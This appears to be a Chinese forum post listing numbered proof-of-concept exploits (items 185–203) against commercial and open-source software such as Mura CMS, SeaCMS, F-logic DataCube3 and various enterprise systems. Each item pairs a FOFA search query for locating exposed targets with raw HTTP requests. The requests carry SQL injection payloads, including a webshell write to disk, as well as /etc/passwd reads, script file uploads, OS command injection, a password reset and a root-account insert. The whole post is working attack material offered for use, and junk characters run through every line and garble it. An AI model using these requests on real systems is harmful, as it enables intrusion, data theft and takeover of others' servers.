Accept-Encoding: gzip, deflate; d- _; X$ _" g* j2 P0 y# _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 s+ R# r8 j) G; s s* g' U
Accept: application/xml, text/xml, */*; q=0.012 |0 P) h7 J: J
Content-Type: text/xml; charset=utf-87 z1 d! C# u" W. N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 i5 t' [9 ?8 T5 O. h& K
X-Requested-With: XMLHttpRequest) \& X. ]. C; b- H
- R" }/ d6 I. ~" P3 {
& i# t! T- P2 X' @' ~: ]insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')4 F9 b! G1 W$ p; L' F! b
& r1 u% e6 K' ?* ~
+ p, j% ^ v+ |1 [185. 瑞友天翼应用虚拟化系统SQL注入- e7 n' g. k5 J
version < 7.0.5.1/ M w; m: j3 I6 w( e6 A
FOFA:app="REALOR-天翼应用虚拟化系统"
8 W) `: {+ e8 {2 u7 @) }3 w7 G/ h7 T! {GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
0 o+ u c1 Z% z( }, G/ kHost: host9 B' z; `( ?6 d, _7 T- b3 c- ^/ R& S
, X* G2 O' X( [! H# _) c0 A
( @5 X+ [! s5 d+ K$ s0 K186. F-logic DataCube3 SQL注入# j0 F4 q2 C% Y# Z1 c' f7 n. _
CVE-2024-31750, A% c- l5 c0 m: v' c6 U
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
* b5 W" _" N! f- fFOFA:title=="DataCube3"/ R% j4 b7 L% o4 ?3 x d* I2 g, [
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
$ L. t5 E4 L) v. k xHost: your-ip/ V5 s+ L+ i3 m' A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0) P4 s' h) }* f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 e+ D( y& w, z: a+ L- v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 r; ~! }( U. G8 W: N
Accept-Encoding: gzip, deflate9 y0 |+ o: z, m1 i; d4 M
Connection: close" |$ W! X& ]! l+ L, K- Q! D) p8 q: N
Content-Type: application/x-www-form-urlencoded$ i# C; _ o7 x" E4 x3 ~' {9 ?
8 D& C# w5 V; w! d; g/ f* Creq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450$ U7 K0 B6 |/ ]4 X, q2 y8 }1 M& \ U
: m, C% ^! ~* m! J) T6 [8 M1 Q
0 M" [# |! t9 G% [' T' P* X2 D187. Mura CMS processAsyncObject SQL注入
2 m9 p) g1 t' ?$ s/ {CVE-2024-32640
% a! w5 K1 p' pFOFA:"Mura CMS"
E6 p2 \3 p3 s- p' R, XPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.15 f3 E; Y$ Y0 @" J: t4 C4 g9 D3 p
Host: your-ip
4 _0 i8 @: j' q1 e7 O, o, OContent-Type: application/x-www-form-urlencoded7 N- m7 s6 n3 {' F; r: u
# G& y; k# M! @/ G5 D4 E; ]6 |# x6 P7 V3 w3 m
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1& D: e7 _9 q+ ^ `! }
4 s+ T( L5 a4 k8 S( A- C! u
) e8 ~/ [! U- O. o& a0 v188. 叁体-佳会视频会议 attachment 任意文件读取
9 u1 l' k* D4 R% |) {version <= 3.9.7% c6 k# ]# e$ [/ y2 b" i4 U
FOFA:body="/system/get_rtc_user_defined_info?site_id"
9 x' a# N% S) Y! GGET /attachment?file=/etc/passwd HTTP/1.1
Q& z1 m( g3 ~* {, }! L( d6 I8 E& NHost: your-ip+ X# R/ C) `4 H% t! O1 W+ W5 L6 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36- L* [% Y/ w6 c, v ]4 C/ T* M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 o9 p8 p0 f% B2 _Accept-Encoding: gzip, deflate
0 B. {$ b2 `5 y U+ tAccept-Language: zh-CN,zh;q=0.9,en;q=0.88 h( d% y. G' w: y9 A
Connection: close( A1 o( U+ F, j( T \2 j4 {, |* M
. |) u+ ~8 l( W( ~& z! f; S9 N4 c# @0 Y. C$ j( }% }
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
" I# Z& |3 o/ G# Y, c tFOFA:app="LANWON-临床浏览系统"
' t$ z5 x" _2 }5 f3 cGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: m* H) v1 }& g$ bHost: your-ip
8 M# @1 K, m& k& Z0 W' C' u: w, pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36+ F0 I2 N6 m/ o& W. M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 D+ J2 S0 M5 B6 A" Q9 p% M
Accept-Encoding: gzip, deflate) \; P8 j1 U" @
Accept-Language: zh-CN,zh;q=0.9
: A; Z: ?9 R. q+ N2 fConnection: close
' e& K4 T6 ]: y- U" v& Z5 H8 H& q' g+ N0 |
6 {5 I' D, B" R- u3 w+ B
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
& a1 ~. B/ O2 i0 b3 [FOFA:title=="短视频矩阵营销系统"3 R, @( f* H, ]; \) Y2 X% [3 l$ P% O
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
v: {) {1 R5 J6 `7 I3 VHost: your-ip; t4 n( d5 g# D! l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36& l. ?! r u8 u2 ~. Z+ e) f @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
! i* Z1 G" l3 O6 X1 JContent-Type: application/x-www-form-urlencoded
. j6 }! ]9 f1 |8 C, {' g5 f1 YAccept-Encoding: gzip, deflate6 U3 O" v) [( h7 M! t1 a# u
Accept-Language: zh-CN,zh;q=0.9
& ^# R- N. S& u+ w9 O
: U+ u( p+ B$ I: jpoi=file:///etc/passwd
+ Z. g& S- |3 i; }% Y/ s4 ~
2 Z: U' G& w5 t4 v
6 ?+ m! T) E* w191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 |" m' o/ h+ S: k1 L$ n3 g
FOFA:body="/CDGServer3/index.jsp"/ Z. e+ y& z( A4 {, L
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
6 k7 m3 X8 ]2 T- ZHost: your-ip
1 ~' o8 B8 P9 j/ t& eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) [! o1 y$ w+ B* s c% d& I$ xContent-Type: application/x-www-form-urlencoded7 Y$ w' K# ]% A) J% ^5 q
! Q+ p* X ]3 Z. W {' T& j2 hcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: }! T q& v6 G/ L3 \& M3 ?( s( v/ I t! {* e, z
: U% m+ n1 q5 |% X; F% L# R192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 j7 i0 \3 O" iFOFA:title="用户登录_富通天下外贸ERP"
" s/ K6 ^& b% J5 {* e. RPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.11 @' ?0 X* D3 T
Host: your-ip. @6 I" i& c5 y, g7 t. I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# X6 I1 H' G0 U! B+ oContent-Type: application/x-www-form-urlencoded) H4 v! v# f+ Y+ m* v
$ o* |* _5 p0 ?' ^
: I6 y2 T8 D$ |8 \+ [<% @ webhandler language="C#" class="AverageHandler" %>7 `% Z0 Q& I- `
using System;
) ?5 [* m6 H2 r" gusing System.Web;
3 U% u: h, W% w& N" Q) n! lpublic class AverageHandler : IHttpHandler$ B% G* _( l7 _; h6 m; }" y/ H5 m: ^
{
% D. F/ m: ^' `- P+ q, |public bool IsReusable$ J- A9 o( L( {& h: f& }5 c
{ get { return true; } }. b- ?" U2 H z7 c& t0 T0 s% r2 _8 R
public void ProcessRequest(HttpContext ctx)
+ e- @) W9 R* T) f{# ?7 I6 [- Z( j
ctx.Response.Write("test");: i# i$ _( s: p1 P1 H) Y6 ~. a
}
5 I3 y9 w3 M, ?; B$ L1 F}: a9 ~1 Y; h( R0 j# x9 e- f
2 b! }; H) O" r. G5 |/ S/ i4 }: T4 S" A0 B- P! o) I O6 J- Z
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 h4 l% a: v0 @, J9 } w1 NFOFA:body="山石云鉴主机安全管理系统") R! D# X. i3 w" U2 ^3 [* L3 {
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
& a) S+ o( R$ G" A2 {" PHost:' D% ^, Y2 [& @5 {3 G2 M% h3 b
Cookie: PHPSESSID=2333333333333;3 Q% D. d& T' E
Content-Type: application/x-www-form-urlencoded% B8 X( F: N8 {0 O$ R
User-Agent: Mozilla/5.0
! k- _5 o5 H) m) k, i4 C+ K/ [3 F8 |3 ?& Q; V! A: a% S
' ]! P/ J& V( v. {! @6 T4 B B- ?
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
! V( q; ?; Y: [8 `$ o8 PHost:
/ t$ S. D( z* W% g# IUser-Agent: Mozilla/5.0- g/ t6 z D# \9 l
Accept-Encoding: gzip, deflate; t& j& H5 B+ U' _ k" @6 k; \
Accept: */*: ?. o8 y3 V7 a" }9 }) H4 e: j
Connection: close
! N; k4 I* R* sCookie: PHPSESSID=2333333333333;$ E9 k1 v* ^; |8 J9 h+ r
Content-Type: application/x-www-form-urlencoded* D; n+ w @- X8 v
Content-Length: 84
, z8 P9 X/ g6 b& q9 D5 {/ L
/ _ u6 s& E8 [0 }param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')- _: ?! C- y% a' f6 V4 |
, \& r1 [, A2 _+ y4 F/ [ j$ b3 e* `% s# o; H& L8 u( \
GET /master/img/config HTTP/1.12 j% Q- ]4 ^* I$ J n( s9 i4 q
Host:+ _. \3 v9 T2 _- h, U+ G
User-Agent: Mozilla/5.0% B& d2 \! B* f, F( A
& [4 }5 h( `5 R- r0 d4 [6 K, l& h: h+ j+ c, U' i+ w% P3 B% U
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传( Y0 h0 K8 u0 z1 E/ S7 \' x; l! {
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
, t# Q5 U. d9 x
4 I8 o ^ v% Y" W4 SPOST /servlet/uploadAttachmentServlet HTTP/1.1
Q+ K0 e* L' j$ D; s/ n- N7 THost: host
7 Q6 N8 w( q& @' _8 z7 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 l7 B0 l8 ]( V$ X- f$ {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. n2 c5 Y3 i; y" E8 x4 Q1 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' M5 n# c' [$ H& W6 H
Accept-Encoding: gzip, deflate
+ H, m9 O/ g; C1 CConnection: close
d( U6 S. }$ ]6 z$ YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
' c* ]6 K( E, h4 a4 `% Y------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 N0 J( @7 o* f" Q1 P- x' t' [) p- Q
2 ~! x" c/ k! g# H F; A2 mContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"% C2 Z; Y; r H& [( o8 p! [
Content-Type: text/plain A! g+ P. y* b+ z) M
<% out.println("hello");%>; z( x# @+ e# e$ A+ [1 a
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
! [& ?9 q! x8 t' a" JContent-Disposition: form-data; name="json"
$ j; {1 M& \' b! ~ {"iq":{"query":{"UpdateType":"mail"}}}
& K( T$ Z- X. s------WebKitFormBoundaryKNt0t4vBe8cX9rZk--( a/ G# p, P0 w) J& h" S
( L3 {) H; c" M) E% A
9 x+ K/ W8 |8 q" T2 u( M195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ i6 Y; I% [/ GFOFA:title=="飞鱼星企业级智能上网行为管理系统
# W ~0 F$ M& W# x: ?POST /send_order.cgi?parameter=operation HTTP/1.1# u# M8 l$ b( T5 N# B$ C
Host: 127.0.0.1
" D+ N) T, Q% Q8 ]& q1 I# bPragma: no-cache
- P4 Z4 J6 D+ A- B& M5 |* u* [# b; Y9 ICache-Control: no-cache, {( k5 M6 @/ I9 ~3 X! e3 m. {. S0 `# O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* T( g, K" P$ x3 h7 {# y9 A. s
Accept: */*7 z+ X9 j/ k" e" F5 Z$ N! [
Accept-Encoding: gzip, deflate
) R& {( _2 W3 T* iAccept-Language: zh-CN,zh;q=0.9( Z4 p% @6 W5 \+ P
Connection: close
+ E; |) o3 J% D* \8 k; L2 EContent-Type: application/x-www-form-urlencoded: f* L' W u2 T" }- q) X& {' i
Content-Length: 68. S0 G2 x+ v) u5 Q5 d3 ]9 v
8 l6 J$ T& `# E: {' f2 ?0 T
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
# H: O, o, i0 c& i+ S+ U% H6 ]! X6 S/ Z$ F
; [) T) }3 x9 w
196. 河南省风速科技统一认证平台密码重置+ A1 U5 l2 _! y$ w4 s, Z* Q
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
. {' ?( ]& D% {3 X' }) D5 hPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1; y# I+ ^' U! ^. M, s- S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: V$ S! u2 ?; ^% `
Content-Type: application/json;charset=UTF-87 @) i, V0 B g, g8 O) S
X-Requested-With: XMLHttpRequest) j) z0 b! X4 Z+ c! J* S% p
Host:! O" A+ O* |) @) E
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.29 }. g9 Y2 i' F, J% n9 W, H2 Q
Content-Length: 45
% t0 [8 l" }& y6 ^* `# P# d: l* hConnection: close
8 \' X( B- e0 T2 C; h- m. ~; L. w6 L$ x, @$ S$ ]
{"xgh":"test","newPass":"test666","email":""}
H5 E. ~# E. l' z* t; R, @1 o { d- t* ?, k( m: z4 o
2 J. S& _& h% n/ D" O5 E0 G, [! G6 s3 k# y! r* S8 X. ^) ]7 ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 b5 L$ D) F5 _+ t7 j6 s6 d
FOFA:app="浙大恩特客户资源管理系统"
( Y& P* D' V9 Z( B6 d. wGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& ~+ g) i# [, C- z8 b, wHost:
7 b, Q3 x& M) Y( k/ l3 w L* vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
2 S; d& B2 x" b: q% d% GAccept-Encoding: gzip, deflate/ n8 S, A1 d4 J/ [" ~% G- o0 V
Connection: close
+ Q/ G& p4 X L) J5 T' q2 e$ W8 _/ u( ? \, o) Y
' R# [' `8 Q8 ]" c! H' n1 @, m
% m' A+ T5 S, r- O0 \7 t2 s" @
198. 阿里云盘 WebDAV 命令注入' [) X# h2 z' z. O. ^6 b
CVE-2024-29640
0 L- J/ G- j5 tGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.13 P. u: c; v6 b J* ]
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64 y8 j, V. e: G) ~
Accept: */*: |7 L) l, W5 i' J* p
Accept-Encoding: gzip, deflate' R" _0 X! K @) [* s
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6# q& j$ H2 o7 [# ]9 E% X1 N
Connection: close6 ]0 V4 J/ V* w* [3 P: n( z
% o( O+ d" f! m7 ^# ~ S) l6 x5 g- ^- I L5 k1 @' t, u
199. cockpit系统assetsmanager_upload接口 文件上传
& Q Q% p* d3 ~
6 M& u+ S) Y+ k6 s1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
g1 j1 Q D5 x( Y2 n+ ZGET /auth/login?to=/ HTTP/1.1
; J3 I5 p: P* K; D" x# V4 |$ H# V
4 J6 Z: \ s; j2 m1 y& M9 L响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
4 }, o/ k/ F4 y5 }& o4 }. _* p# L e' v" p
2.使用刚才上一步获取到的jwt获取cookie:
' z& E3 b- }; i) `- C. N9 h' s
z! h& G2 W5 o, ?POST /auth/check HTTP/1.1% a" M% B& k8 a6 k1 F
Content-Type: application/json5 ^3 b! t: k: `/ a& D8 o; {
* z( z: R4 \: x) G" L5 C0 @
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
( t6 [! D' b+ z/ x9 `8 f: R
7 j" P. y: ?; `+ e h7 `* }响应:200,返回值:; ?# m7 A }7 N# G
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
8 U. ] A: m( C' vFofa:title="Authenticate Please!"3 _& z1 L* y6 B6 o' D. W! r% E* Y) Q
POST /assetsmanager/upload HTTP/1.1
4 B. J6 I, p3 l ]% nContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
/ b& I0 H& @' `5 ACookie: mysession=95524f01e238bf51bb60d77ede3bea92
. Q1 q4 {4 G) o: ~# i7 ?/ B( {$ ~: C/ r: v) b! e! {
-----------------------------36D28FBc36bd6feE7Fb3
" C2 Y0 w# S" G. I# B' K' xContent-Disposition: form-data; name="files[]"; filename="tttt.php"5 W U6 ]# y b) H
Content-Type: text/php& p$ D, l3 L! W) o9 ^6 ?" C
6 ^# |5 Q% R7 p1 C: Q: d<?php echo "tttt";unlink(__FILE__);?># O' ^0 {/ _4 X9 _" m7 l
-----------------------------36D28FBc36bd6feE7Fb37 [+ {+ {2 X6 ~, |" H& j8 K
Content-Disposition: form-data; name="folder"! B) y! ^9 Y2 X
% K9 l9 {8 ~) m u# W: v0 ^-----------------------------36D28FBc36bd6feE7Fb3--0 C& P" H; L( Z
3 b: y. {# W D* ]! Q, j
0 A A) \! Z7 z1 K/storage/uploads/tttt.php
+ Z4 }# i; G t; k) L" W, [$ B
$ ~7 M! m3 b- l. B8 Q8 ?3 k200. SeaCMS海洋影视管理系统dmku SQL注入
; C1 J/ q9 c' H0 ` B+ K7 i' IFOFA:app="海洋CMS"/ ]: e2 {5 B. p: a+ b" t. S
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1; X% Y& W; G5 t( ]! E
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
4 [9 L: ~( e q; V. i# B2 Y8 {Upgrade-Insecure-Requests: 1, C C8 T! E: K" m
Cache-Control: max-age=0
: t1 }7 K3 K7 b8 Z0 P+ }' X0 r/ uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 v+ v) e* l/ B; _, W" m! }5 n
Accept-Encoding: gzip, deflate- g' A% @7 h# c3 \ _7 _
Accept-Language: zh-CN,zh;q=0.9
/ c- @4 z; Y' p
4 V' c+ P# d5 ^! q1 q( E& m( X* v
201. 方正全媒体新闻采编系统 binary SQL注入
6 d. o" K3 i; F* X) V$ l+ ~3 AFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
$ ]2 V4 G* t% I0 C* E# C2 }POST /newsedit/newsplan/task/binary.do HTTP/1.1: v2 [7 c6 L% z. F0 j- F
Content-Type: application/x-www-form-urlencoded+ X4 O* @' F; A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, T) g: j+ ]+ O; V0 l" P0 j
Accept-Encoding: gzip, deflate J& e. K/ V: w. w( d- I
Accept-Language: zh-CN,zh;q=0.9
7 V5 y6 `$ ]/ @Connection: close( V. ], b% L n! V
6 X" l+ s G: a+ z3 O
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1. d* z4 ^/ n2 G1 i" P
2 A- b# L! U& _2 G) z9 Y9 Z. D% D/ m1 s- c! g% p/ Q
202. 微擎系统 AccountEdit任意文件上传
" W1 j. b9 n/ r+ F# Z0 WFOFA:body="/Widgets/WidgetCollection/"2 G' {! O1 Q, B! A& |
获取__VIEWSTATE和__EVENTVALIDATION值, x2 y3 I7 O( l
GET /User/AccountEdit.aspx HTTP/1.1
7 ^9 E* D0 ]+ T7 F9 C+ CHost: 滑板人之家
6 I+ a2 n+ u5 o% x9 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
, U! f3 l+ W, o) \) q. eContent-Length: 04 Y* C8 }- h8 _# K, d/ M- X
0 p) g4 s8 T# Y5 i6 T
6 F p4 E, P, [& ?) Y替换__VIEWSTATE和__EVENTVALIDATION值8 y M5 x8 q% ^* x5 ]. O }$ a
POST /User/AccountEdit.aspx HTTP/1.1* O6 G8 v- D+ U. K. z$ j
Accept-Encoding: gzip, deflate, br
3 x% S S. [7 k! ~( ~$ YContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 M" F! L# G" L5 \& R
/ ~2 I& S7 s3 K% A-----------------------------786435874t38587593865736587346567358735687
' {3 ~! g) B6 y6 O LContent-Disposition: form-data; name="__VIEWSTATE"( X0 d/ }& |' P% b/ E
6 W; ?3 I( ^- e# B; n. u0 D' I
__VIEWSTATE7 U4 E, G/ L- w1 k
-----------------------------786435874t385875938657365873465673587356873 e& H* L+ j" \6 A1 c& l
Content-Disposition: form-data; name="__EVENTVALIDATION"
2 [' W. z8 C/ [; F2 z# C) o$ O- M U
__EVENTVALIDATION
4 [8 X' w- [- c/ Y6 i-----------------------------786435874t38587593865736587346567358735687
8 U" L' K4 J2 j4 F, nContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"1 ?# E1 i' q; g( n
Content-Type: text/plain
& }* }8 K$ i# b+ T6 G* Y/ a" n0 i$ t( r# `7 e6 T
Hello World!- }2 m. b _! N2 o1 }
-----------------------------786435874t38587593865736587346567358735687) }6 e8 d& i2 k: b0 C1 s+ w
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
, |+ n# Q: x L7 u. ~! S$ }" v: m- @& P4 s# J- x
上传图片+ [( E0 t2 N. j$ B6 c
-----------------------------786435874t38587593865736587346567358735687 z( g2 [4 X' Y x: }* |: ^
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName" R7 B5 _8 E& r) q9 M
# _5 h! R& S, A) B9 r: E
" c7 c6 t3 f" y- q: n, Y: r-----------------------------786435874t38587593865736587346567358735687
! [6 A5 b. j3 X3 M! U6 a" rContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
% a" V- Z |/ R$ {5 r
& R9 A3 o# T f9 F- P2 f6 H, @0 f' w6 I# h
-----------------------------786435874t38587593865736587346567358735687--3 W: u- f+ Y+ r' d5 P, a; S# @
6 t1 C! P' C# I' M+ m4 G# R2 [+ q5 o6 I# K
/_data/Uploads/1123.txt3 J6 N) \: u& a0 ]
+ B1 J' [5 z* c! F# M- W203. 红海云EHR PtFjk 文件上传
: g% n1 F0 O# X, x [7 RFOFA:body="RedseaPlatform" o2 x' C8 R2 U& Y9 Y+ r% h' ]: Q3 ]
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1' N9 l% ?, q. Y$ A6 [" R. v
Host: x.x.x.x
* \+ p# _3 t& U! g/ L( c/ {: \Accept-Encoding: gzip
: N) h* J9 i/ w J# d7 T! rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 B3 u. Q0 ?5 M2 F/ X' ~! ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 s; [* q! A: w( k4 [
Content-Length: 210
; q# @0 [. N9 E
1 K" N$ E5 M+ H) }------WebKitFormBoundaryt7WbDl1tXogoZys4
% M- I7 z( v8 m. L8 z+ zContent-Disposition: form-data; name="fj_file"; filename="11.jsp"" `3 M( j$ \( n9 G z
Content-Type:image/jpeg1 h4 `; j$ U2 J3 h6 ~# ~/ I0 j+ ^
- f3 M' T2 e. }1 \- @; X
<% out.print("hello,eHR");%>
% F4 H' L6 z. R j2 X1 X9 s! G------WebKitFormBoundaryt7WbDl1tXogoZys4--
7 o# i- o2 i" P# |. a' U+ b, \
4 }) l, m. p0 Q* [3 w, D ) L( j% q8 B' A( f* r2 h+ g
" u. y) y5 R. w+ P
5 O; h$ E9 A8 E) L; _% W. f5 l% O7 z! v! Q8 i* T
" E" C: h# o: R o0 m
|
发表于 2024-6-5 14:31:29
收藏
支持
反对